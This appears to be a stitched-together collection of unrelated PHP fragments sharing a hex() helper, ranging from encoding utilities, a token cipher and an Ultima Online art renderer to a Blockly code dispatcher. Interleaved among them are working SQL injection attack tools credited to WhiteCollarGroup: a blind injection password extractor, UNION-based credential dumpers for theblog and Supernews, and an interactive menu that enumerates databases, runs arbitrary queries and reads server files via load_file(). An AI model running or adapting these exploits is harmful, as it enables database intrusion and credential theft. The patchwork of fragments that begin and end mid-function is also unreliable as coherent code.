/**
 * Percent-encodes every character of $content as '%XX'.
 *
 * Relies on len(), mid(), asc() and hex(), which are not PHP builtins and
 * are defined elsewhere; their exact semantics are not visible here. Every
 * character is encoded, including ones a URL would not need escaped.
 *
 * @param string $content text to encode
 * @return string the encoded text ('' when len() reports 0)
 */
function encCode($content)
{
    $encoded = '';
    for ($pos = 1; $pos <= len($content); $pos++) {
        $encoded .= '%' . hex(asc(mid($content, $pos, 1)));
    }
    return $encoded;
}
/*
 * Boolean-based blind SQL injection probe (attack tooling; documented here for
 * review and detection purposes, not improved). It opens a raw TCP connection
 * to $hostname:80, requests {$path}fichero.php with a hex()-encoded query that
 * compares one character (position $pos) of a password column against $char,
 * and treats the absence of "Page not found" in the reply as "character
 * matches" (true) and its presence as "no match" (false).
 * Observations: $reply is appended to before it is initialised; hex() is not a
 * PHP builtin and is defined elsewhere; $username is accepted but never used
 * (the WHERE clause carries a redacted literal).
 * Defensive reading: many near-identical requests to one endpoint that differ
 * only in a position/character pair are the pattern to alert on in web-server
 * logs, and a parameterised query in fichero.php removes the oracle entirely.
 */
function check_chr($hostname, $path, $pos, $char, $username) { $char = ord($char); if (!($sp = fsockopen($hostname, 80, $errno, $errstr, 5))) { die("[-] Unknow hostname."); } $query = hex("1' OR ASCII(SUBSTRING((SELECT password FROM morcego_users WHERE username='******'),{$pos},1))={$char}-- "); $request = "GET {$path}fichero.php?{$query} HTTP/1.1\r\n" . "Host: {$hostname}\r\n" . "Connection: Close\r\n\r\n"; fputs($sp, $request); /* $reply is never initialised before this loop */ while (!feof($sp)) { $reply .= fgets($sp, 1024); } fclose($sp); if (preg_match("|Page not found|", $reply)) { return false; } else { return true; } }
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n"; if ($argc != 2) { echo "Usage: \n"; echo "php {$argv['0']} <target url>\n"; echo "Example:\n"; echo "php {$argv['0']} http://www.website.com/blog\n"; exit; } $target = $argv[1]; if (substr($target, strlen($target) - 1) != "/") { $target .= "/"; } $inject = $target . "index.php?id=" . urlencode("-0' "); echo "[*] Trying to get informations...\n"; $token = uniqid(); $token_hex = hex($token); // http://localhost/cms/theblog/theblog2-0/index.php?id=-62%27%20UNION%20ALL%20SELECT%201,2,3,4,5,concat%28login,0x3c3d3e,senha,0x3c3d3e,nivel%29,7,8,9,10,11,12,13%20from%20theblog_users%20LIMIT%200,1--+ $infos = file_get_contents($inject . urlencode("union all select 1,2,3,4,5,concat({$token_hex},user(),{$token_hex},version(),{$token_hex}),7,8,9,10,11,12,13-- ")); $infos_r = array(); preg_match_all("/{$token}(.*){$token}(.*){$token}/", $infos, $infos_r); $user = $infos_r[1][0]; $version = $infos_r[2][0]; if ($user) { echo "[!] MySQL version: {$version}\n"; echo "[!] MySQL user: {$user}\n"; } else { echo "[-] Error while getting informations.\n"; } echo "[*] Getting users...\n"; $i = 0; while (true) {
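/**
 * Percent-encodes each character of $url as '%XX' using its ascW() value.
 *
 * Uses len(), mid(), ascW() and hex(), which are not PHP builtins and are
 * defined elsewhere. The accumulator is now initialised explicitly: the
 * original concatenated onto an undefined variable, which raised a warning
 * on the first iteration and is why the return was '@'-suppressed. For an
 * input where len() reports 0 the result is '' (previously null).
 *
 * @param string $url text to encode
 * @return string the encoded text
 */
function urlToAsc($url)
{
    $encoded = '';
    for ($pos = 1; $pos <= len($url); $pos++) {
        $encoded .= '%' . hex(ascW(mid($url, $pos, 1)));
    }
    return $encoded;
}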
/*
 * Interactive post-exploitation menu (attack tooling; documented here for
 * review and detection purposes, not improved). All database access goes
 * through runquery(), puts()/gets()/hex() are helpers defined elsewhere.
 * Option 1 walks information_schema (schemata, tables, columns) one row at a
 * time with LIMIT n,1 and then dumps the chosen columns; option 2 passes a
 * typed query straight to runquery(); option 3 reads a server file through
 * SELECT load_file(); option 4 prints credits. Every branch re-enters main().
 * As presented on one line, the embedded "//" comments swallow the rest of
 * each line, so this listing is not syntactically valid as-is.
 * Defensive reading: LIMIT n,1 walks over information_schema and load_file()
 * selects from a web application account are the query shapes to alert on in
 * database audit logs; an application account without the FILE privilege and
 * with access limited to its own schema blocks options 1 and 3.
 */
function main($msg = null) { global $token, $token_hex; echo "\n" . $msg . "\n"; puts("[>] MAIN MENU"); puts("[1] Browse MySQL"); puts("[2] Run SQL Query"); puts("[3] Read file"); puts("[4] About"); puts("[0] Exit"); $resp = gets(); if ($resp == "0") { exit; } elseif ($resp == "1") { // fetch dbs $i = 0; puts("[.] Getting databases:"); while (true) { $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT {$i},1"); if ($pega) { puts(" - " . $pega); } else { break; } $i++; } puts("[!] Current database: " . runquery("SELECT database()")); puts("[?] Enter database name for select:"); $own = array(); $own['db'] = gets(); $own['dbh'] = hex($own['db']); // fetch tables of the db $i = 0; puts("[.] Getting tables from {$own['db']}:"); while (true) { $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema={$own['dbh']} LIMIT {$i},1"); if ($pega) { puts(" - " . $pega); } else { break; } $i++; } puts("[?] Enter table name for select:"); $own['tb'] = gets(); $own['tbh'] = hex($own['tb']); // fetch columns of the table $i = 0; puts("[.] Getting columns from {$own['db']}.{$own['tb']}:"); while (true) { $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema={$own['dbh']} AND table_name={$own['tbh']} LIMIT {$i},1"); if ($pega) { puts(" - " . $pega); } else { break; } $i++; } puts("[?] Enter columns name, separated by commas (\",\") for select:"); $own['cl'] = explode(",", gets()); // fetch column data foreach ($own['cl'] as $coluna) { $i = 0; puts("[=] Column: {$coluna}"); while (true) { $pega = runquery("SELECT {$coluna} FROM {$own['db']}.{$own['tb']} LIMIT {$i},1"); if ($pega) { puts(" - {$pega}"); $i++; } else { break; } } echo "\n[ ] -+-\n"; } main(); } elseif ($resp == "2") { puts("[~] RUN SQL QUERY"); puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat()."); puts("[?] 
Query (enter for exit): "); $query = gets(); if (!$query) { main(); } else { main(runquery($query . "\n")); } } elseif ($resp == "3") { puts("[?] File path (may not have priv):"); $file = hex(gets()); $le = runquery("SELECT load_file({$file}) AS wc"); if ($le) { main($le); } else { main("File not found, empty or no priv!"); } } elseif ($resp == "4") { puts("Coded by WhiteCollarGroup"); puts("www.wcgroup.host56.com"); puts("*****@*****.**"); puts("twitter.com/WCollarGroup"); puts("facebook.com/WCollarGroup"); puts("wcollargroup.blogspot.com"); main(); } else { main("[!] Wrong choice."); } }
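/**
 * Reversible symmetric encoding for signed tokens: an RC4-like keystream is
 * derived from md5 of the key and XORed over the message.
 *
 * Layout of the plaintext that is encrypted (ENCODE builds it, DECODE checks it):
 *   [0,10)  expiry as a zero-padded decimal unix time, '0000000000' = never
 *   [10,26) first 16 hex chars of md5(payload . $keyb), the integrity tag
 *   [26,..) the payload itself
 *
 * Changes against the previous revision: the debug line that echoed the
 * keystream ("xor key is ...") on every call is gone, the tag is compared with
 * hash_equals(), and a token that is too short or carries a non-numeric
 * timestamp is rejected instead of reaching string arithmetic (a TypeError on
 * PHP 8). Tokens produced by the previous revision decode unchanged.
 *
 * @param string $string    payload to encode, or a token produced by ENCODE
 * @param string $operation 'DECODE' or anything else (= encode)
 * @param string $key       secret; empty falls back to the UC_KEY constant
 * @param int    $expiry    seconds until the token expires (ENCODE only), 0 = never
 * @return string the token; or the payload, '' when the token is expired,
 *                tampered with or malformed
 */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)
{
    // Length (0..32) of the per-message key (IV) stored in front of the
    // ciphertext. Fixed at 0 here, so equal plaintext+key gives equal tokens.
    $ckey_length = 0;

    $key = md5($key ? $key : UC_KEY);
    // $keya drives the keystream, $keyb the integrity tag.
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    // $keyc is the per-message IV; empty while $ckey_length is 0.
    // NOTE(review): md5(microtime()) is not a CSPRNG-quality IV source; if
    // $ckey_length is ever made non-zero, derive $keyc from random_bytes().
    $keyc = $ckey_length
        ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length))
        : '';

    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);

    if ($operation == 'DECODE') {
        // Padding was stripped on ENCODE; non-strict base64_decode tolerates that.
        $string = (string) base64_decode(substr($string, $ckey_length));
    } else {
        $string = sprintf('%010d', $expiry ? $expiry + time() : 0)
            . substr(md5($string . $keyb), 0, 16)
            . $string;
    }
    $string_length = strlen($string);
    $result = '';

    // Key scheduling: fill the 256-entry box from the repeated crypt key and
    // permute it. The original author's note: looks elaborate, adds no real
    // strength.
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // Keystream generation and XOR. The swap uses $box[$i] as the temporary
    // rather than $box[$a] (textbook RC4); it is deliberately left alone
    // because every token already issued depends on it.
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$i];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ $box[($box[$a] + $box[$j]) % 256]);
    }

    if ($operation == 'DECODE') {
        // Shorter than timestamp + tag: cannot be a valid token.
        if (strlen($result) < 26) {
            return '';
        }
        $stamp = substr($result, 0, 10);
        $tag = substr($result, 10, 16);
        $payload = substr($result, 26);
        // Constant-time tag check before anything else is interpreted.
        if (!hash_equals(substr(md5($payload . $keyb), 0, 16), $tag)) {
            return '';
        }
        // Never feed a non-numeric timestamp to arithmetic.
        if (preg_match('/^[0-9]{10}$/', $stamp) !== 1) {
            return '';
        }
        $stamp = (int) $stamp;
        if ($stamp === 0 || $stamp > time()) {
            return $payload;
        }
        return '';
    }

    // Base64 keeps the token safe in URLs/cookies; '=' padding is dropped.
    return $keyc . str_replace('=', '', base64_encode($result));
}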
/* Tail of a helper whose start lies outside this listing: it maps a component
   value to a doubled hex pair (12 => "CC", 13 => "DD", 14 => "EE", anything
   else => "FF" is all that is visible here). */
if ($n == 12) { return "CC"; } else { if ($n == 13) { return "DD"; } else { if ($n == 14) { return "EE"; } else { return "FF"; } } } } } } } }
/**
 * Builds a six-character web colour string from three components by
 * concatenating hex_of() for each. Note this hex() takes three arguments,
 * unlike the one-argument hex() helpers in neighbouring listings.
 */
function hex($r, $g, $b) { return hex_of($r) . hex_of($g) . hex_of($b); }
/* Emits a 16x16x16 = 4096-row colour swatch table. bgcolor is written without
   a leading '#' and the cells are not closed; browsers tolerate both. */
echo "<html><table>\n"; for ($i = 0; $i < 16; $i++) { for ($j = 0; $j < 16; $j++) { for ($k = 0; $k < 16; $k++) { echo " <tr><td>" . hex($i, $j, $k) . "</td><td width=16px bgcolor=" . hex($i, $j, $k) . "></tr>\n"; } } } echo "\n</table></html>\n";
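<?php
/*
 * Smoke test for the HashCryptMd5 / HashCryptSha1 classes: encodes a fixed
 * string in OFB and CFB mode, prints the hex ciphertext, then decodes it and
 * prints the result for inspection by eye (nothing is asserted).
 * $cryptClass selects which implementation is exercised.
 *
 * NOTE(review): judging by the names these appear to be home-grown ciphers
 * keyed from md5/sha1 (their code is not visible here). For real data use a
 * vetted construction such as sodium_crypto_secretbox() or an OpenSSL AEAD
 * mode rather than a custom hash-based stream cipher.
 */
require dirname(__FILE__) . '/../lib/HashCryptMd5.php';
require dirname(__FILE__) . '/../lib/HashCryptSha1.php';

// The original appended to an undefined $string (a warning on first use);
// build the fixture explicitly instead.
$string = str_repeat("It works!:) ", 20);
$passwordEncoding = '1234567890';
$passwordDecoding = '1234567890';
$cryptClass = 'HashCryptMd5';

p($string);

// encoding
$stringOFB = $cryptClass::lib()->encodeOFB($string, $passwordEncoding);
$stringCFB = $cryptClass::lib()->encodeCFB($string, $passwordEncoding);
hex($stringOFB);
hex($stringCFB);

// decoding
$stringOFB = $cryptClass::lib()->decodeOFB($stringOFB, $passwordDecoding);
$stringCFB = $cryptClass::lib()->decodeCFB($stringCFB, $passwordDecoding);
p($stringOFB);
p($stringCFB);

/**
 * Prints $s inside a <p> element. No HTML escaping is applied, so only pass
 * locally generated strings as this script does.
 *
 * @param string $s
 */
function p($s)
{
    echo "<p>" . $s . "</p>";
}

/**
 * Prints the hex dump of a binary string (used for the ciphertexts).
 *
 * @param string $s
 */
function hex($s)
{
    p(bin2hex($s));
}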
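/**
 * Resolves a colour name, or a case-insensitive prefix of one, to its code
 * via hex(), a helper defined elsewhere in this file.
 *
 * Lookup order over the global $names (code => name): an exact match on the
 * whole name wins; otherwise the first entry whose name starts with $q,
 * compared case-insensitively, is used. An empty $q therefore matches the
 * first entry, as before.
 *
 * The prefix test used to be a regular expression built from $q without
 * preg_quote(), so a query containing '/' or PCRE metacharacters produced a
 * preg_match() warning or matched the wrong entries; it is now a literal
 * comparison. Both comparisons are done on strings, so numeric-looking names
 * are no longer compared as numbers.
 *
 * @param string $q colour name or prefix
 * @return mixed hex($hex) of the matched entry, false if nothing matches
 */
function name($q)
{
    global $names;
    $q = (string) $q;

    foreach ($names as $hex => $name) {
        if ((string) $name === $q) {
            return hex($hex);
        }
    }

    $prefixLength = strlen($q);
    foreach ($names as $hex => $name) {
        if (strncasecmp((string) $name, $q, $prefixLength) === 0) {
            return hex($hex);
        }
    }

    return false;
}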
$request = strip_tags(file_get_contents($url . urlencode("union all select 1,2,3,4,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),6,7 from supernews_login limit {$i},1-- "))); preg_match_all("/{$token}(.*){$token}(.*){$token}/", $request, $get); if ($get[1][0] != "") { $user = $get[1][0]; $pass = $get[2][0]; echo "\nUser: {$user}\nPass: {$pass}\n"; $i++; } else { echo "\nGood luck! :-D"; break; } } } elseif ($version == 2) { $i = 0; while (true) { $request = strip_tags(file_get_contents($url . urlencode("uniunionon seleselectct 1,2,3,4,5,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),7,8 from supernews_login limit {$i},1-- "))); preg_match_all("/{$token}(.*){$token}(.*){$token}/", $request, $get); if ($get[1][0] != "") { $user = $get[1][0]; $pass = $get[2][0]; echo "\nUser: {$user}\nPass: {$pass}\n"; $i++; } else { echo "\nGood luck! :-D"; break; } } } else { echo "\n\nThis site are using an unknown version of Supernews or another CMS."; echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable."; echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
/**
 * Renders one static-art tile from the Ultima Online MUL files under
 * ./uofiles/, caches it as images/art/art_<index>_<hue>.png and, when $show
 * is 1, streams the PNG to the client. Returns nothing; calls exit after
 * unavailable_pic() when artidx.mul or art.mul cannot be opened.
 *
 * Helpers defined elsewhere: hex() (converts $id/$hue; presumably hex string
 * to int, given the hexdec($oldhue) check at the end), read_byte($fh, $n)
 * (reads an $n-byte little-endian integer, presumably), unavailable_pic().
 *
 * NOTE(review): $id and $hue are interpolated into the cache path passed to
 * file_exists()/imagecreatefrompng() and into the Content-disposition header
 * before hex() normalises them. If they come from the request, restrict them
 * to hex digits (e.g. ctype_xdigit) before use so a value containing "../"
 * cannot point the path outside images/art/.
 * NOTE(review): the cache is probed with the raw $id/$hue but written with
 * $index (= converted id) and the adjusted decimal $hue, so the early-return
 * path only fires when both spellings coincide — confirm this is intended.
 * $size, $flag and $orighue are read but never used.
 *
 * @param mixed $id   art id (converted by hex(); 0x4000 is added for the art.mul index)
 * @param mixed $hue  hue id (converted by hex(); 0 or out of 1..65535 = no hue)
 * @param int   $show 1 to emit headers and the PNG, anything else to only cache
 */
function createart($id, $hue, $show) {
    // Cache hit: serve the previously rendered PNG (with black as transparent).
    if (file_exists("images/art/art_" . $id . "_" . $hue . ".png")) {
        if ($show == 1) {
            Header("Content-type: image/png");
            Header("Content-disposition: inline; filename=art_" . $id . "_" . $hue . ".png");
            $img = imagecreatefrompng("images/art/art_" . $id . "_" . $hue . ".png");
            $black = imagecolorallocate($img, 0, 0, 0);
            imagecolortransparent($img, $black);
            imagepng($img);
            return;
        }
        //return;
    }
    $oldhue = $hue;
    $mulpath = "./uofiles/";
    $hue = hex($hue);
    $id = hex($id);
    // Static art is stored after the 0x4000 land tiles in art.mul/artidx.mul.
    $id += 0x4000;
    $hues = FALSE;
    $tiledata = FALSE;
    $gumpindex = FALSE;
    $gumpfile = FALSE;
    //open files for reading
    //**********************
    if ($hue < 1 || $hue > 65535) {
        //If invalid or missing hue, unset hue and don't read hues.mul and tiledata.mul
        $hue = 0;
    } else {
        //If valid hue, read hues.mul and tiledata.mul
        $hues = fopen("{$mulpath}hues.mul", "rb");
        if ($hues == FALSE) {
            $hue = 0;
        }
        $tiledata = fopen("{$mulpath}tiledata.mul", "rb");
        if ($tiledata == FALSE) {
            $hue = 0;
        } else {
            // Locate this tile's record in tiledata.mul; the constants are the
            // MUL record layout (land block, group header, 37-byte entries).
            $index = $id - 0x4000;
            $group = intval($index / 32);
            $groupidx = $index % 32;
            fseek($tiledata, 512 * 836 + 1188 * $group + 4 + $groupidx * 37, SEEK_SET);
            $tileflag = read_byte($tiledata, 4);
            // Flag 0x40000: "partial hue" — only grey pixels (r == g == b) take the hue.
            if ($tileflag & 0x40000) {
                $partialhue = 1;
            } else {
                $partialhue = 0;
            }
            fclose($tiledata);
        }
    }
    //Read artidx.mul
    // 12-byte index entries: offset into art.mul, size, (unused extra).
    $gumpindex = fopen("{$mulpath}artidx.mul", "rb");
    if ($gumpindex == FALSE) {
        unavailable_pic();
        exit;
    } else {
        fseek($gumpindex, $id * 12, SEEK_SET);
        $lookup = read_byte($gumpindex, 4);
        $size = read_byte($gumpindex, 4);
        fclose($gumpindex);
    }
    //Read art.mul
    $gumpfile = fopen("{$mulpath}art.mul", "rb");
    if ($gumpfile == FALSE) {
        unavailable_pic();
        exit;
    } else {
        fseek($gumpfile, $lookup, SEEK_SET);
        $flag = read_byte($gumpfile, 4);
        $width = read_byte($gumpfile, 2);
        $height = read_byte($gumpfile, 2);
        //create base image
        //**********************
        $im = imagecreatetruecolor($width, $height);
        $almostblack = imagecolorallocate($im, 0, 0, 0);
        imagefill($im, 0, 0, $almostblack);
        $black = imagecolorallocate($im, 0, 0, 0);
        imagecolortransparent($im, $black);
        imagealphablending($im, true);
        imageSaveAlpha($im, true);
        //Read pixels
        //**********************
        // One 16-bit row offset per line (in 16-bit words, relative to $datastart).
        for ($i = 0; $i < $height; $i++) {
            $offset[$i] = read_byte($gumpfile, 2);
        }
        $datastart = ftell($gumpfile);
        $x = 0;
        $y = 0;
        //Display without hues
        //**********************
        if ($hue <= 0) {
            // Run-length rows: (xOffset, xRun) pairs; 0,0 ends a row, a sum
            // above 2048 is treated as corrupt data and stops decoding.
            while ($y < $height) {
                $xOffset = read_byte($gumpfile, 2);
                $xRun = read_byte($gumpfile, 2);
                if ($xRun + $xOffset > 2048) {
                    break;
                } else {
                    if ($xRun + $xOffset != 0) {
                        $x += $xOffset;
                        for ($Run = 0; $Run < $xRun; $Run++) {
                            // 16-bit 5:5:5 colour, scaled to 8-bit channels.
                            $color[$Run] = read_byte($gumpfile, 2);
                            $r = ($color[$Run] >> 10) * 8;
                            $g = ($color[$Run] >> 5 & 0x1f) * 8;
                            $b = ($color[$Run] & 0x1f) * 8;
                            if (imagecolorexact($im, $r, $g, $b) == -1) {
                                $col = imageColorAllocate($im, $r, $g, $b);
                                imagesetpixel($im, $x, $y, $col);
                            } else {
                                $found = imagecolorexact($im, $r, $g, $b);
                                imagesetpixel($im, $x, $y, $found);
                            }
                            $x++;
                        }
                    } else {
                        $x = 0;
                        $y++;
                        if (isset($offset[$y])) {
                            fseek($gumpfile, $offset[$y] * 2 + $datastart, SEEK_SET);
                        }
                    }
                }
            }
        } else {
            // Hue ids are 1-based; 0x8000 marks a variant; ids above 3001 fall back to 1.
            $hue = $hue - 1;
            $orighue = $hue;
            if ($hue > 0x8000) {
                $hue = $hue - 0x8000;
            }
            if ($hue > 3001) {
                $hue = 1;
            }
            // Byte offset of this hue's 32-entry palette in hues.mul
            // (88-byte entries in groups of 8 with a 4-byte header each).
            $colors = intval($hue / 8) * 4;
            $colors = 4 + $hue * 88 + $colors;
            fseek($hues, $colors, SEEK_SET);
            for ($i = 0; $i < 32; $i++) {
                $color32[$i] = read_byte($hues, 2);
                // Force the top bit (alpha/opaque marker) on every palette entry.
                $color32[$i] |= 0x8000;
            }
            while ($y < $height) {
                $xOffset = read_byte($gumpfile, 2);
                $xRun = read_byte($gumpfile, 2);
                if ($xRun + $xOffset > 2048) {
                    break;
                } else {
                    if ($xRun + $xOffset != 0) {
                        $x += $xOffset;
                        for ($Run = 0; $Run < $xRun; $Run++) {
                            $color[$Run] = read_byte($gumpfile, 2);
                            $r = $color[$Run] >> 10;
                            $g = $color[$Run] >> 5 & 0x1f;
                            $b = $color[$Run] & 0x1f;
                            // Partial hue: only grey pixels are remapped through the
                            // palette; full hue: every pixel is remapped by its red channel.
                            if ($partialhue == 1 && ($r == $g && $r == $b)) {
                                $newr = ($color32[$r] >> 10) * 8;
                                $newg = ($color32[$r] >> 5 & 0x1f) * 8;
                                $newb = ($color32[$r] & 0x1f) * 8;
                            } else {
                                if ($partialhue == 1) {
                                    $newr = $r * 8;
                                    $newg = $g * 8;
                                    $newb = $b * 8;
                                } else {
                                    $newr = ($color32[$r] >> 10) * 8;
                                    $newg = ($color32[$r] >> 5 & 0x1f) * 8;
                                    $newb = ($color32[$r] & 0x1f) * 8;
                                }
                            }
                            if (imagecolorexact($im, $newr, $newg, $newb) == -1) {
                                $col = imageColorAllocate($im, $newr, $newg, $newb);
                                imagesetpixel($im, $x, $y, $col);
                            } else {
                                $found = imagecolorexact($im, $newr, $newg, $newb);
                                imagesetpixel($im, $x, $y, $found);
                            }
                            $x++;
                        }
                    } else {
                        $x = 0;
                        $y++;
                        if (isset($offset[$y])) {
                            fseek($gumpfile, $offset[$y] * 2 + $datastart, SEEK_SET);
                        }
                    }
                }
            }
            fclose($hues);
        }
    }
    fclose($gumpfile);
    $index = $id - 0x4000;
    // Undo the 1-based adjustment so the cache name carries the requested hue.
    if (hexdec($oldhue) > 0) {
        $hue = $hue + 1;
    }
    // NOTE(review): NULL for the int filters parameter is deprecated since PHP 8.1.
    imagepng($im, "images/art/art_" . $index . "_" . $hue . ".png", 0, NULL);
    imagedestroy($im);
    if ($show == 1) {
        Header("Content-type: image/png");
        // The suggested filename uses $id (index + 0x4000) while the file on
        // disk uses $index; only the download name differs.
        Header("Content-disposition: inline; filename=art_" . $id . "_" . $hue . ".png");
        $img = imagecreatefrompng("images/art/art_" . $index . "_" . $hue . ".png");
        $black = imagecolorallocate($img, 0, 0, 0);
        imagecolortransparent($img, $black);
        imagepng($img);
        imagedestroy($img);
    }
    return;
}
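/**
 * Dispatches a Blockly <block> DOM element to the code generator registered
 * for its "type" attribute and returns the generated code.
 *
 * A node that is not a DOMNode (null, false, ...) yields ''. A node that is
 * not a <block> echoes "xml Wrong" plus its node name and yields ''. An
 * unregistered type echoes a diagnostic and yields '' — previously that
 * branch fell off the end of the switch and returned null, so callers that
 * concatenate results now always receive a string. The attribute value is
 * only used as a lookup key; it is never used as a callee name.
 *
 * All generator functions are defined elsewhere in this file.
 *
 * @param mixed $block DOMElement for a <block>, or null for "no block"
 * @return string generated code ('' when there is nothing to generate)
 */
function blockToCode($block)
{
    if (!$block instanceof DOMNode) {
        return '';
    }
    if ($block->nodeName !== 'block') {
        echo "xml Wrong";
        echo $block->nodeName;
        return '';
    }

    // Block type => generator function. The name differs from the type
    // wherever the generator was not a 1:1 rename.
    static $generators = array(
        'controls_if' => 'controls_if',
        'logic_boolean' => 'logic_bool',
        'logic_compare' => 'logic_compare',
        'logic_operation' => 'logic_operation',
        'logic_negate' => 'logic_negate',
        'logic_ternary' => 'logic_ternary',
        'logic_null' => 'logic_null',
        'controls_whileUntil' => 'controls_whileUntil',
        'controls_flow_statements' => 'controls_flow_statements',
        'io_buzzer' => 'buzzer_msec',
        'text' => 'textvalue',
        'text_print' => 'prints',
        'math_number' => 'math_number',
        'motion' => 'motion',
        'turn' => 'turn',
        'soft_turn' => 'soft_turn',
        'back_turn' => 'back_turn',
        'position_motion' => 'position_motion',
        'position_turn' => 'position_turn',
        'position_turn_soft' => 'position_turn_soft',
        'position_turn_back' => 'position_turn_back',
        'sensor_white' => 'sensor_white',
        'sensor_sharp' => 'sensor_sharp',
        'sensor_ir' => 'sensor_ir',
        'buzzer_on' => 'buzzer_on',
        'buzzer_off' => 'buzzer_off',
        'delay_ms' => 'delay_ms',
        'math_arithmetic' => 'math_arithmetic',
        'math_single' => 'math_single',
        'math_trig' => 'math_trig',
        'math_modulo' => 'math_modulo',
        'register' => 'register',
        'pin' => 'pin',
        'set_item' => 'set_item',
        'call_function' => 'call_function',
        'call_function_with_return' => 'call_function_with_return',
        'function_defreturn' => 'function_defreturn',
        'function_defnoreturn' => 'function_defnoreturn',
        'procedures_callnoreturn' => 'procedures_callnoreturn',
        'procedures_callreturn' => 'procedures_callreturn',
        'hex' => 'hex',
        'return' => 'returnr',
        'variable_get' => 'variable_get',
        'incl_ude' => 'incl_ude',
        'define' => 'def_ine',
    );

    $type = $block->getAttribute('type');
    if (isset($generators[$type])) {
        $generator = $generators[$type];
        return $generator($block);
    }

    echo "not defined in blockToCode " . $type;
    return '';
}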